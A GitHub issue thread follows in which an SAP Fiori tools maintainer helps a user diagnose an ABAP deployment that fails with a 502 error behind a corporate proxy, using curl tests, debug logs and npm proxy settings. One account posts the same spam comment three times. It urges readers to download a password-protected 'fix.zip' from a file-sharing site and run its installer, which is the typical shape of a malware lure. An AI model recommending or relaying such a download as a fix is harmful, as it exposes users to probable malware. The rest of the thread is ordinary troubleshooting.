### ISSUE TITLE
BUG - deployment to ABAP fails with 502 error from Axios

### ISSUE THREAD

**Issue by tavnabisoft** [SAP/open-ux-tools#2279]
### Related Feature
No related fuatures/issues found

### Description
Deployment to ABAP using `deploy-to-abap` task fails with following error:
```
debug abap-deploy-task *** Retrieving application *** from /sap/opu/odata/UI5/ABAP_REPOSITORY_SRV, AxiosError: Request failed with status code 502
```
We're connecting to ABAP system through the gateway, deployment happens through `fiori deploy --config ui5.yaml --yes` command
Full log of command is attached to an issue (all private parts are being masked with asterisk
[deploy-to-abap-logs.txt](https://github.com/user-attachments/files/16746373/deploy-to-abap-logs.txt)
).

### Expected results
Application is deployed to ABAP system protected behind proxy

### Actual results
Error being thrown

#### Version/Components/Environment
@sap/ux-ui5-tooling version: 1.14.1
Add any other context about the problem here
OS:                      
- [ ] Mac OS
- [x] Windows
- [ ] Other

### Problem
{describe the problem} 

### Fix
{describe the fix} 

### Why was it missed
{Some explanation why this issue might have been missed during normal development/testing cycle}  

### How can we avoid this
{if we don’t want to see this type of issues anymore what we should do to prevent}

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by longieirl** [comment]
Hi @tavnabisoft 

Can you please run the following command;
```
curl -L -u ‘username:password’ -X GET -i -H 'X-Csrf-Token:Fetch' http://your-site-url/sap/bc/adt/discovery > output.txt
```
Please update the username, password and site URL details to reflect your environment.

This is a good test to validate, independent of our tooling if its an issue with the ABAP target system and/or any local proxy/firewall as the HTTP error 502 indicates an upstream issue.

Can you also confirm any details related to your ABAP system? Any additional details about your system would be appreciated too i.e. on-premise | cloud.

Thanks.
John

**Comment by tavnabisoft** [comment]
Hello @longieirl  ,

Thanks for quick response! I've attached output files for both commands.
[output-tsk1.txt](https://github.com/user-attachments/files/16758774/output-tsk1.txt)
[output-tsk2.txt](https://github.com/user-attachments/files/16758777/output-tsk2.txt)

ABAP system is on-premise. Here is some additional info that may be useful:
|   |   |   |   |
| - | - | - | - |
| SAP_BASIS  | 752 | 0012 | SAPK-75212INSAPBASIS | SAP Basis Component |
| SAP_ABA  | 752 | 0012 | SAPK-75212INSAPABA | Cross-Application Component |
| SAP_GWFND | 752 | 0012 | SAPK-75212INSAPGWFND | SAP Gateway Foundation |
| SAP_UI  | 757 | 0003 | SAPK-75703INSAPUI | User Interface Technology |

There is a workaround for mentioned issue is by running in parallel `ui5 serve` command which refers to ui config with `fiori-tools-proxy` middleware which proxies requests to abap system. Here is the config of ui5.yaml file:
```yaml
specVersion: "3.0"
metadata:
  name: ***
type: application

server:
  customMiddleware:
    # credentials are defined via environment variables vars: https://www.npmjs.com/package/@sap/ux-ui5-tooling#providing-credentials
    - name: fiori-tools-proxy
      afterMiddleware: compression
      configuration:
        ignoreCertError: false
        backend:
          - path: /sap/opu/odata
            url: https://***.com
          - path: /sap/public/bc
            url: https://***.com
```
Let me know if you need any further details.

Best Regards,
Slava

**Comment by longieirl** [comment]
@tavnabisoft so you are running the command `fiori deploy --config ui5.yaml --yes` which is reading the `ui5.yaml` as the config. Can you share this config?

Also, when you ran the curl commands? Were they run with ui5-serve running in the background?

**Comment by tavnabisoft** [comment]
@longieirl we've run mentioned curl commands **without** running `ui5 serve` command in the background. So requests are executed with no issues without proxying by ui5 middleware.

Here is config which we're using for deployment to abap. If we're running deployment with `ui5 serve` in background, url of abap system is changed to `http://localhost:8080`:
```yaml
specVersion: "3.0"
metadata:
  name: test-app
type: application

builder:
  resources:
    excludes:
      - /test/**
      - /localService/**
      - /index.html

  customTasks:

    - name: ui5-tooling-transpile-task
      afterTask: escapeNonAsciiCharacters
      configuration:
        debug: false
        removeConsoleStatements: true
        transformAsyncToPromise: true

    - name: deploy-to-abap
      afterTask: generateCachebusterInfo
      configuration:
        target:
          url: https://***.com
          auth: basic
        app:
          name: /TESTAPP
          description: "Test app"
          package: /TEST
          transport: ABC1324567
        credentials:
          username: env:SAP_GATEWAY_AUTH_USR
          password: env:SAP_GATEWAY_AUTH_PSW
```

**Comment by longieirl** [comment]
Morning @tavnabisoft, a couple of things to note,
The curl commands are picking up the proxy `Fortinet-Proxy` so I'm wondering if the issue is related to this. The ui5 command must be picking up the proxy as well. When I look at the `deploy-to-abap-logs.txt` it shows the host as `proxy.***.com`, is this correct? Is that the expected proxy?

It might be worth reviewing the npm proxy settings to ensure the proxy is picked up;
https://ga.support.sap.com/dtp/viewer/index.html#/tree/3046/actions/45995:48363:53593:53499

Also, when you run `ui5 serve`, it should indicate in the logs if a proxy is defined? Can you confirm this?

FYI, you can append the following `exclude` to the same level as app and target;
```yaml
        exclude:
          - /test/
```
You also have `testMode: true` configured but this is not in your config. By default it should be false. I'm wondering where this is being picked up?

**Comment by tavnabisoft** [comment]
Hi @longieirl 
> The ui5 command must be picking up the proxy as well. When I look at the deploy-to-abap-logs.txt it shows the host as proxy.***.com, is this correct? Is that the expected proxy?

Yes, it is an expected proxy, the url has been masked. I've attached additional log for details, urls should be there: 
[abap-deploy-logs-3.txt](https://github.com/user-attachments/files/16797062/abap-deploy-logs-3.txt)

> It might be worth reviewing the npm proxy settings to ensure the proxy is picked up; https://ga.support.sap.com/dtp/viewer/index.html#/tree/3046/actions/45995:48363:53593:53499

Checked => proxy urls are set up

> Also, when you run `ui5 serve`, it should indicate in the logs if a proxy is defined? Can you confirm this?

Yes, according to the logs proxy config is being picked. I've attached logs of `ui5 serve` command for reference: 
[ui5-serve-logs.txt](https://github.com/user-attachments/files/16798340/ui5-serve-logs.txt)

> FYI, you can append the following exclude to the same level as app and target;

Thanks for notice, we will adjust that :)

> You also have testMode: true configured but this is not in your config. By default it should be false. I'm wondering where this is being picked up?

Yes, I've executed the task in test mode firstly (was defined in config of the `deploy-to-abap` task). The newly provided logs [abap-deploy-logs-3.txt](https://github.com/user-attachments/files/16797062/abap-deploy-logs-3.txt) were executed with test mode being turned off

**Comment by longieirl** [comment]
Hi @tavnabisoft,

Thanks again for the logs;
A couple of more questions!
1. Have you configured a SAP Fiori system using the URL and client as defined in your ui5 yaml configuration? For example, if you open VSCode and select SAP Fiori on the left navigation bar, is there is a system created matching the same host and client?
2. Can you please create a new scipt in your package.json or manipulate the existing script, for example;
```bash
# Windows
set DEBUG=* && fiori deploy --config ui5.yaml --yes
# Linux/Mac
DEBUG=* && fiori deploy --config ui5.yaml --yes
```
You may need to tweak the fiori command to ensure it matches your deployment settings. Please attach the generated log, again, you may need to obfuscate any sensitive data.

This should hopefully output all the axios HTTP requests which might provide more insight to why the request is failing.

Thanks.
John

**Comment by tavnabisoft** [comment]
Hello @longieirl,

1. System was added but test connection returns following error:
```log
2024-09-04 12:55:06.600 [error] The V2 request failed with error: Request failed with status code 502.
2024-09-04 12:55:06.601 [error] The V4 request failed with error: Request failed with status code 502.
```
2. Please find attached logs of mentioned script: [debug-all-deploy-log.txt](https://github.com/user-attachments/files/16869139/debug-all-deploy-log.txt)

**Comment by longieirl** [comment]
Thank you again for the latest scripts.

I've a feeling the ui5 serve is working since that pulls in as many environment variables as it can find i.e.

```JSON
        process.env.FIORI_TOOLS_PROXY ||
        process.env.npm_config_proxy ||
        process.env.npm_config_https_proxy ||
        process.env.http_proxy ||
        process.env.HTTP_PROXY ||
        process.env.https_proxy ||
        process.env.HTTPS_PROXY ||
```

But I'm wondering what the npm proxy settings are; if you run the following command, it will output the the variables used when npm is executed;
```bash
npm config list
```
Does this have a proxy setting? Can you please verify they are correct.

You can edit this file by running the following command, it will default to your system editor i.e. `vi`;
```bash
npm config edit
```
You can set them manually;
```bash
npm config set proxy http://<username><password>@proxy-server-url>:<port>
npm config set https-proxy http://<username><password>@proxy-server-url>:<port>
```

Once you have made any modifications, you can re-run the deploy command again.

Thanks.

**Comment by longieirl** [comment]
Ok! Thank you for the investigation, its appreciated. Let me do some more analysis and I will hopefully come up with a plan of action to get this resolved.

**Comment by longieirl** [comment]
Soo I've been playing with the following docker setup;
```yaml
---
services:
  proxy:
    image: ubuntu/squid:latest
    container_name: squidproxy
    restart: unless-stopped
    ports:
      - 3128:3128
```

Then setting the npm proxy using;
```bash
npm config set proxy http://localhost:3128
npm config set https-proxy http://localhost:3128
```
And I'm able to deploy as expected, in the squid proxy logs, I can see the GET and POST requests.

I need to tweak the settings to validate passing credentials to see if that is an issue.
